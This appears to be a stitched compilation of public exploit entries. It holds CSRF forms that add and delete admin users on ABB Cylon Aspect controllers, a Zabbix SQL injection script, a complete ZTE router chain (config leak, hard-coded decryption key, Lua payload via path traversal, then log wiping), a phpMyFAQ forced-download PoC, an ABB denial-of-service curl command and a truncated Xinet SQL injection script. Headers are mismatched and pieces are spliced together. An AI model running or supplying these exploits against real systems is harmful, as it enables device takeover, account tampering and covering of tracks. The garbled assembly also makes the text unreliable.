ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5893
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5893.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ http://192.168.73.31/factorySaved.php?title=<script>console.log('ZSL')</script>
<html>
<!--
ABB Cylon Aspect 3.08.02 (userManagement.php) Cross-Site Request Forgery
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5870
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5870.php
CVE ID: CVE-2024-48846
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48846
21.04.2024
-->
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
// Add User/Admin
<body>
<form action="http://192.168.73.31/userManagement.php" method="POST">
<input type="hidden" name="USER" value="zeroscience" />
<input type="hidden" name="PASSWORD" value="ZSL251" />
<input type="hidden" name="ACTION" value="Add" />
<input type="submit" value="Make me a prince! (php)" />
</form>
</body>
// Add User/Admin
<body>
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input type="hidden" name="newuser" value="test" />
<input type="hidden" name="password" value="test123" />
<input type="hidden" name="passwordConfirm" value="test123" />
<input type="hidden" name="Insert" value="Add" />
<input type="submit" value="Make me a prince! (java)" />
</form>
</body>
// Delete User/Admin
<body>
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input type="hidden" name="user9" value="test" />
<input type="hidden" name="remove9" value="1" />
<input type="hidden" name="totalRows" value="9" />
<input type="hidden" name="Delete" value="Delete" />
<input type="submit" value="Destr0y" />
</form>
</body>
</html>
# Exploit Title: Zabbix 7.0.0 - SQL Injection
# Date: 06/12/2024
# Exploit Author: Leandro Dias Barata @m4nb4
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://support.zabbix.com/browse/ZBX-25623
# Version: 6.0.0 - 6.0.31 / 6.0.32rc1; 6.4.0 - 6.4.16 / 6.4.17rc1; 7.0.0
# Tested on: Kali Linux kali-linux-2024.3
# CVE: CVE-2024-42327
import requests
import argparse
# Zabbix's JSON-RPC endpoint (api_jsonrpc.php) expects JSON request bodies.
HEADERS = {"Content-Type": "application/json"}
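def main():
    """Log in to the Zabbix API and probe ``user.get``'s ``selectRole`` for CVE-2024-42327.

    A ``SLEEP(5)`` expression is injected into the ``selectRole`` field list.
    Verdicts: an API error means the field list is validated (not vulnerable);
    a response delayed by at least the sleep interval means the injected SQL
    ran (vulnerable); no error and no delay is reported as inconclusive rather
    than as vulnerable. A failed login is reported instead of being carried on
    as ``auth: null`` (which previously surfaced as a false NOT VULNERABLE).

    Notes: ``SLEEP()`` is MySQL-specific; on a PostgreSQL backend the injected
    expression errors out and is reported as NOT VULNERABLE. The legacy
    ``auth`` request member is used as before; newer Zabbix releases may
    require an ``Authorization: Bearer`` header instead -- confirm for the
    target version.
    """
    import time  # stdlib; imported here so this check stays self-contained

    sleep_seconds = 5
    parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327")
    parser.add_argument("-t", "--target", required=True, help="API URL")
    parser.add_argument("-u", "--username", required=True, help="Username")
    parser.add_argument("-p", "--password", required=True, help="Password")
    args = parser.parse_args()
    url = f"{args.target.rstrip('/')}/api_jsonrpc.php"
    # Login to get the token
    login_data = {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {"username": args.username, "password": args.password},
        "id": 1,
        "auth": None
    }
    try:
        login_response = requests.post(url, json=login_data, headers=HEADERS, timeout=30)
        login_response.raise_for_status()
        login_body = login_response.json()
        auth_token = login_body.get("result")
        if "error" in login_body or not auth_token:
            print(f"[!] Login failed: {login_body.get('error', login_body)}")
            return
        # Time-based SQLi test: the last selectRole entry is an expression, not a column name
        data = {
            "jsonrpc": "2.0",
            "method": "user.get",
            "params": {
                "selectRole": ["roleid", "name", "type", f"readonly AND (SELECT(SLEEP({sleep_seconds})))"],
                "userids": ["1", "2"]
            },
            "id": 1,
            "auth": auth_token
        }
        started = time.monotonic()
        test_response = requests.post(url, json=data, headers=HEADERS, timeout=sleep_seconds * 4 + 30)
        elapsed = time.monotonic() - started
        test_response.raise_for_status()
        if "error" in test_response.json():
            print("[-] NOT VULNERABLE (selectRole field list was rejected).")
        elif elapsed >= sleep_seconds:
            print(f"[!] VULNERABLE (response delayed {elapsed:.1f}s by SLEEP({sleep_seconds})).")
        else:
            print(f"[?] INCONCLUSIVE: no API error but no delay ({elapsed:.1f}s); re-check manually.")
    except requests.RequestException as e:
        print(f"[!] Request error: {e}")
    except ValueError as e:  # body was not JSON
        print(f"[!] Unexpected non-JSON response: {e}")


if __name__ == "__main__":
    main()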
# Exploit Title: ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES
def login(host, port, username, password):
    """POST the web-UI login form with ``username``/``password``.

    The response is not inspected. No cookie is kept either: every later
    request in this PoC is a plain ``requests`` call without a session, so
    the router presumably ties the login to the client address.
    """
    form = {
        "Username": username,
        "Password": password,
        "Frm_Logintoken": "",
        "action": "login",
    }
    requests.post(
        f"http://{host}:{port}/",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )
def logout(host, port):
    """POST the web-UI logoff form (``IF_LogOff=1``); the reply is ignored."""
    form = {
        "IF_LogOff": "1",
        "IF_LanguageSwitch": "",
        "IF_ModeSwitch": "",
    }
    requests.post(
        f"http://{host}:{port}/",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )
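def leak_config(host, port):
    """Download the router's configuration backup and save it as ``config.bin``.

    Posts an (empty) multipart ``config`` field to the UsrCfgMgr page; the
    response body is the backup blob. This runs before ``login`` in ``pwn``,
    i.e. no authentication is needed -- that is the bypass the PoC relies on.
    The connection is always closed and the file handle released.

    NOTE(review): the body delimiters are sent exactly as in the original PoC,
    i.e. ``<boundary>`` rather than the RFC 2046 ``--<boundary>`` form. The
    author reports it works against this firmware, so it is left untouched.
    """
    boundary = "---------------------------25853724551472601545982946443"
    body = (
        f"{boundary}\r\n"
        'Content-Disposition: form-data; name="config"\r\n'
        "\r\n"
        "\r\n"
        f"{boundary}--\r\n"
    )
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
        "Connection": "keep-alive",
    }
    conn = http.client.HTTPConnection(host, port, timeout=60)
    try:
        conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)
        response_data = conn.getresponse().read()
    finally:
        conn.close()
    with open("config.bin", "wb") as file:
        file.write(response_data)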
def _read_exactly(fd, size, desc="data"):
    """Read exactly ``size`` bytes from ``fd``.

    Returns the bytes, or ``None`` on a short read (truncated stream).
    ``desc`` only labels the field for callers; it is not used here.
    """
    buf = fd.read(size)
    return buf if len(buf) == size else None
def _read_struct(fd, fmt, desc="struct"):
    """Read one ``struct``-formatted record from ``fd``.

    Returns the unpacked tuple, or ``None`` when fewer than
    ``struct.calcsize(fmt)`` bytes were available.
    """
    raw = _read_exactly(fd, struct.calcsize(fmt), desc)
    return None if raw is None else struct.unpack(fmt, raw)
def read_aes_data(fd_in, key):
    """Gather the AES chunk stream from ``fd_in`` and return the plaintext as a BytesIO.

    Each chunk is a ``>3I`` header (unused word, length, marker) followed by
    ``length`` bytes; a zero marker ends the stream. The ciphertext is
    AES-128-ECB under ``key`` NUL-padded/truncated to 16 bytes -- the
    firmware's own scheme reproduced here, not a recommendation. Returns
    ``None`` on a truncated stream.
    """
    chunks = []
    while True:
        header = _read_struct(fd_in, ">3I", desc="AES chunk header")
        if header is None:
            return None
        _, length, marker = header
        piece = _read_exactly(fd_in, length, desc="AES chunk data")
        if piece is None:
            return None
        chunks.append(piece)
        if marker == 0:
            break
    cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
    return BytesIO(cipher.decrypt(b"".join(chunks)))
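def read_compressed_data(fd_in, enc_header):
    """Inflate the zlib chunk stream that follows an encryption header.

    ``enc_header`` is the 15-word (``>15I``) header the caller already read.
    Word 6 must be the CRC32 of words 0-5 and word 5 the running CRC32 of all
    compressed chunk bytes; each chunk is ``>3I`` (uncompressed length,
    compressed length, marker) followed by the compressed bytes, and a zero
    marker ends the stream.

    Returns a BytesIO positioned at 0 holding the inflated data, or ``None``
    when the stream is truncated, a CRC or length does not match, or a chunk
    is not valid zlib data (the original let ``zlib.error`` escape in that
    case). The chunk reads are done inline rather than via the ``_read_*``
    helpers so the function is self-contained.
    """
    if enc_header[6] != zlib.crc32(struct.pack(">6I", *enc_header[:6])):
        return None
    running_crc = 0
    out = BytesIO()
    chunk_hdr_size = struct.calcsize(">3I")
    while True:
        raw_hdr = fd_in.read(chunk_hdr_size)
        if len(raw_hdr) != chunk_hdr_size:
            return None
        uncompr_len, compr_len, marker = struct.unpack(">3I", raw_hdr)
        chunk = fd_in.read(compr_len)
        if len(chunk) != compr_len:
            return None
        running_crc = zlib.crc32(chunk, running_crc)
        try:
            inflated = zlib.decompress(chunk)
        except zlib.error:
            return None
        if len(inflated) != uncompr_len:
            return None
        out.write(inflated)
        if marker == 0:
            break
    if enc_header[5] != running_crc:
        return None
    out.seek(0)
    return out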
def read_config(fd_in, fd_out, key):
    """Parse a ZTE config backup from ``fd_in`` and write the plaintext to ``fd_out``.

    Layout as walked below: three "version" headers (the first at offset 0,
    the next two at offsets derived from their predecessors), a signature
    header at 0x80 (magic 0x04030201) followed by the signature bytes, then a
    15-word encryption header (magic 0x01020304) whose word 1 selects the
    encoding:
      0 - zlib chunk stream only;
      1 - AES chunk stream, decrypted output written as-is;
      2 - AES chunk stream wrapping a second encryption header + zlib stream.
    Any short read, bad magic, or missing ``key`` for an encrypted file makes
    the function return silently without writing anything.

    ``fd_in`` must be a real file object: ``stat(fd_in.name)`` is evaluated
    even though ``file_size`` (like ``signed_cfg_size``) is never used.
    """
    ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
    if ver_header_1 is None:
        return
    # 0x14 == struct.calcsize(">5I"); the header's last word is a relative offset
    ver_header_2_offset = 0x14 + ver_header_1[4]
    fd_in.seek(ver_header_2_offset)
    ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
    if ver_header_2 is None:
        return
    # absolute offset of the third header
    ver_header_3_offset = ver_header_2[10]
    fd_in.seek(ver_header_3_offset)
    ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
    if ver_header_3 is None:
        return
    signed_cfg_size = ver_header_3[3]  # unused
    file_size = stat(fd_in.name).st_size  # unused; requires a named file
    # signature block lives at a fixed offset regardless of the headers above
    fd_in.seek(0x80)
    sign_header = _read_struct(fd_in, ">3I", desc="signature header")
    if sign_header is None:
        return
    if sign_header[0] != 0x04030201:
        return
    sign_length = sign_header[2]
    # the signature itself is skipped over, never verified here
    signature = _read_exactly(fd_in, sign_length, desc="signature")
    if signature is None:
        return
    enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
    if enc_header_raw is None:
        return
    encryption_header = struct.unpack(">15I", enc_header_raw)
    if encryption_header[0] != 0x01020304:
        return
    enc_type = encryption_header[1]
    if enc_type in (1, 2):
        if not key:
            return
        # from here on fd_in is the decrypted stream, not the file
        fd_in = read_aes_data(fd_in, key)
        if fd_in is None:
            return
        if enc_type == 2:
            # the decrypted payload starts with its own encryption header
            enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
            if enc_header_raw is None:
                return
            encryption_header = struct.unpack(">15I", enc_header_raw)
            if encryption_header[0] != 0x01020304:
                return
            # fall through to the zlib path with the inner header's CRCs
            enc_type = 0
    if enc_type == 0:
        fd_in = read_compressed_data(fd_in, encryption_header)
        if fd_in is None:
            return
    fd_out.write(fd_in.read())
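def decrypt_config(config_key):
    """Decrypt ``config.bin`` and return the ``(username, password)`` of the IGD.AU2 web account.

    Runs ``read_config`` with ``config_key`` to produce ``decrypted.xml``, pulls
    the ``User``/``Pass`` ``val="..."`` attributes that follow the ``IGD.AU2``
    marker out of it, and deletes both files again. Cleanup uses ``os.remove``
    in a ``finally`` block (the original shelled out to ``rm`` and skipped
    cleanup on any error, leaving the plaintext credentials on disk).

    Raises ValueError when the markers are not found, which usually means the
    wrong key (garbage XML) or a different firmware layout.
    """
    try:
        with open("config.bin", "rb") as encrypted, open("decrypted.xml", "wb") as decrypted:
            read_config(encrypted, decrypted, config_key)
        with open("decrypted.xml", "r") as file:
            contents = file.read()
        try:
            account = contents.split("IGD.AU2")[1]
            username = account.split("User")[1].split("val=\"")[1].split("\"")[0]
            password = account.split("Pass")[1].split("val=\"")[1].split("\"")[0]
        except IndexError as exc:
            raise ValueError("IGD.AU2 credentials not found in decrypted config (wrong --config_key?)") from exc
    finally:
        for leftover in ("config.bin", "decrypted.xml"):
            if os.path.exists(leftover):
                os.remove(leftover)
    return username, password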
def change_log_level(host, port, log_level):
    """Set the router's log verbosity to ``"critical"`` (2) or ``"notice"`` (5).

    ``pwn`` raises the level to notice right after planting the payload in the
    username and lowers it back to critical at the end, so the higher level is
    presumably what gets the username written into /var/userlog.txt. The two
    GETs mimic the UI opening the page before the form POST. Any other
    ``log_level`` raises KeyError before any request is sent.
    """
    base = f"http://{host}:{port}"
    form = {
        "IF_ACTION": "Apply",
        "_BASICCONIG": "Y",
        "LogEnable": "1",
        "LogLevel": {"critical": "2", "notice": "5"}[log_level],
        "ServiceEnable": "0",
        "Btn_cancel_LogManagerConf": "",
        "Btn_apply_LogManagerConf": "",
        "downloadlog": "",
        "Btn_clear_LogManagerConf": "",
        "Btn_save_LogManagerConf": "",
        "Btn_refresh_LogManagerConf": "",
    }
    requests.get(base + "/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(base + "/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(
        base + "/common_page/ManagDiag_LogManag_lua.lua",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )
def change_username(host, port, new_username, old_password):
    """Rename the IGD.AU2 web account to ``new_username``, keeping ``old_password``.

    ``pwn`` uses this twice: once to store the Lua payload as the username
    (no length or character filtering is applied by the PoC), and once to put
    the real name back. The password fields are all set to the current
    password so only the name changes.
    """
    base = f"http://{host}:{port}"
    form = {
        "IF_ACTION": "Apply",
        "_InstID": "IGD.AU2",
        "Right": "2",
        "Username": new_username,
        "Password": old_password,
        "NewPassword": old_password,
        "NewConfirmPassword": old_password,
        "Btn_cancel_AccountManag": "",
        "Btn_apply_AccountManag": "",
    }
    requests.get(base + "/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
    requests.get(base + "/common_page/accountManag_lua.lua")
    requests.post(
        base + "/common_page/accountManag_lua.lua",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )
def clear_log(host, port):
    """Clear the router's log (``IF_ACTION=clearlog``) after the payload has fired."""
    base = f"http://{host}:{port}"
    requests.get(base + "/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(base + "/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(
        base + "/common_page/ManagDiag_LogManag_lua.lua",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data={"IF_ACTION": "clearlog"},
    )
def refresh_log(host, port):
    """Ask the log page to refresh (``IF_ACTION=Refresh``), flushing entries to the log file."""
    base = f"http://{host}:{port}"
    requests.get(base + "/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(base + "/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(
        base + "/common_page/ManagDiag_LogManag_lua.lua",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data={"IF_ACTION": "Refresh"},
    )
def trigger_rce(host, port):
    """Make getpage.lua render /var/userlog.txt as a page template.

    The second GET abuses directory traversal in the `nextpage` parameter
    (seven `..%2f` segments, then `var%2fuserlog.txt`). rce() wraps the
    command in `<? _G.os.execute(...) ?>`, so a log file containing that
    snippet is executed when served as a Lua template. That the username set
    by change_username() lands in this log is inferred from pwn()'s sequence,
    not visible here. Nothing is read back from the response.
    """
    page = f"http://{host}:{port}/getpage.lua?pid=123&nextpage="
    traversal = "..%2f" * 7 + "var%2fuserlog.txt"
    requests.get(f"{page}ManagDiag_StatusManag_t.lp&Menu3Location=0")
    requests.get(f"{page}{traversal}&Menu3Location=0")
def rce(cmd):
    """Wrap a shell command in a Lua short-tag for the target's template engine.

    The snippet first deletes /var/userlog.txt (so the payload does not fire
    again on later renders) and then runs cmd. cmd is spliced unescaped into a
    single-quoted Lua string: a literal ' in cmd breaks the payload, and any
    ; in it starts a further shell command.
    """
    opening = "<? _G.os.execute('rm /var/userlog.txt;"
    closing = "') ?>"
    return opening + cmd + closing
def pwn(config_key, host, port):
    """Run the full chain: config leak -> credential decrypt -> login -> log-template RCE -> cleanup.

    leak_config(), decrypt_config(), login() and logout() are defined elsewhere
    in the file. The command output is never read back — the visible helpers
    discard every response — so "[+] PoC complete" is printed whether or not
    the command actually ran; confirm on the device. The cleanup steps restore
    the original username, wipe the log that carried the payload and set the
    log level to "critical" (presumably its prior value).
    """
    leak_config(host, port)
    username, password = decrypt_config(config_key)
    login(host, port, username, password)

    command = "echo \"pwned\""
    # plant the Lua payload as the account name, then get it into the log
    change_username(host, port, rce(command), password)
    refresh_log(host, port)
    change_log_level(host, port, "notice")
    refresh_log(host, port)
    trigger_rce(host, port)

    # cleanup
    clear_log(host, port)
    change_username(host, port, username, password)
    change_log_level(host, port, "critical")
    logout(host, port)
    print("[+] PoC complete")
def main():
    """CLI entry: parse target host/port (and optional config key) and run pwn().

    --config_key defaults to a hard-coded key described as leaked from cspd;
    it is converted to bytes because decrypt_config() takes bytes.
    """
    parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
    parser.add_argument(
        "--config_key",
        type=str.encode,
        default=b"GrWM3Hz<vz&f^9",
        help="Leaked config encryption key from cspd",
    )
    parser.add_argument("--host", required=True, help="Target IP address of the router")
    parser.add_argument("--port", required=True, type=int, help="Target port of the router")
    opts = parser.parse_args()
    pwn(opts.config_key, opts.host, opts.port)
# Script entry point.
if __name__ == "__main__":
    main()
# Exploit Title: phpMyFAQ v3.2.10 - Unintended File Download Triggered by Embedded Frames
# Date: 13 Dec 2024
# Exploit Author: George Chen
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: v3.2.10
# Tested on: Mac, Win
# CVE : CVE-2024-55889
*Summary*
A vulnerability exists in the FAQ Record component of
https://github.com/thorsten/phpMyFAQ v3.2.10 where a privileged attacker
can trigger a file download on a victim’s machine upon page visit by
embedding it in an <iframe> element without user interaction or explicit
consent.
*Details*
In http://localhost/admin/index.php?action=editentry&id=20&lang=en, where a
FAQ record is created or edited, an attacker with rights to edit FAQ records
can insert an <iframe> (via the editor's "source code" view) pointing to a
"malicious" attachment previously uploaded through the FAQ "new attachment"
function. Any visit to that FAQ then triggers an automatic download: from the
edit screen the download starts with no prompt; on the public FAQ view, as a
normal user, a confirmation pop-up may be shown first depending on the
browser (Firefox, for instance, does not require any interaction).
[image: image.png]
*PoC*
1. create a new FAQ record and upload a “malicious” file — in my case, I
uploaded an eicar file. Take note of the uri, ie
“index.php?action=attachment&id=2”
2. in the FAQ record, insert a “source code” blob using the “< >” button
3. insert in the following snippet and save FAQ record:
<p><iframe src="index.php?action=attachment&id=2"></iframe></p> [image:
image.png]
4. Once the edit page reloads, the malicious code will be downloaded
onto the local machine without user interaction:[image: image.png]
Advisory:
https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-m3r7-8gw7-qwvc
Disclosure: https://geochen.medium.com/cve-2024-55889-03572ae6c35c
# Exploit title: ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) File Write DoS
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
arbitrary content injection vulnerability in the webServerDeviceLabelUpdate.php
script due to a lack of input validation. Authenticated attackers can exploit
the 'deviceLabel' POST parameter to write arbitrary content to a fixed file
location at /usr/local/aam/etc/deviceLabel, potentially causing a denial of
service.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5892
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5892.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/webServerDeviceLabelUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "deviceLabel=`printf '%.0sA' {1..10000}`"
# alternatively: --data-urlencode "deviceLabel@largecontent.txt" (keep this as a separate line: a trailing "\" on the previous line would splice it into the command, sending a stray "#" and making --data-urlencode live; the {1..10000} brace expansion needs bash/zsh)
$ curl http://192.168.73.31/webServerConfiguration.php | grep AAA
# Exploit Title: Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
# Exploit author: hyp3rlinx
import requests,time,re,sys,argparse
#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#UPDATED: Jan 2024 for python3
#TODO: add SSL support
#===============================
